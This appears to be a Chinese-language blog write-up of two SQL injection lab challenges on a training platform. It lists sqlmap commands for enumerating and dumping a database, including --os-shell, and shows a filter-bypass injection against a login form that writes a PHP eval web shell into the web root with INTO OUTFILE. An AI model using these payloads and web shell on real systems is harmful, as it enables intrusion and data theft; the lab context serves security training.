尤里的复仇II 回归

sqlmap尝鲜题

Tips:
在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松……
很简单的啦,一跑就出来啦
传送门

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --os-shell//控制目标服务器
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --flush--session//刷新会话文件
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --batch//默认行为
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9* //*指定注入
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9* --dump-all//下载所有数据
ua  --random-agent --risk3 --level3 -m批量操作

step1:

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --batch//测试是否存在注入

step2:

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -current-db --batch//查询当前数据库

step2:

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --dbs //列出所有数据库

step3:

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" --tables --batch//查询当前数据库中的所有表

step4:

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" --columns --batch//查询指定库中指定表的所有列(字段)

step5:

sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" -C "flag" --dump --batch//打印出指定数据

sql-注入绕过防护getshell

Tips:
这天,在朋友的介绍下,他受邀测试了某集团的网站,在签完授权合同后,他平复下激动的心情,找到漏洞所在点,祭出神器,结果……
他发现有拦截,于是开始放下工具,学习如何绕狗……
最终,他成功完成了这次任务
一个基础的绕过,感受下绕过的逻辑
传送门
进入后台http://rhiq8003.ia.aqlab.cn/bees/admin/
登入栏存在post传参,于是在登入页面输入判断回显点

' order by 6 -- g

因为有过滤所以再输入

' a and nd un union ion seselectlect 1,2,3,4,5 -- g

发现在这里插入图片描述
有点回显点不能看见,换种方式

知道网站目录

' a and nd updatexml(1,concat(0x21,@@basedir),1) -- a

在这里插入图片描述

上传木马

1' un union ion seselectlect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e   in into outoutfilefile 'D:/phpStudy/WWW/bees/shell.php' -- a

<?php @eval($_POST[cmd]);?>
在这里插入图片描述
上传成功
在这里插入图片描述
用菜刀连接
在这里插入图片描述
找flag
在这里插入图片描述

flag_{axdeDaf}
在这里插入图片描述

posted @ 2022-10-12 21:30  sparename  阅读(121)  评论(0)    收藏  举报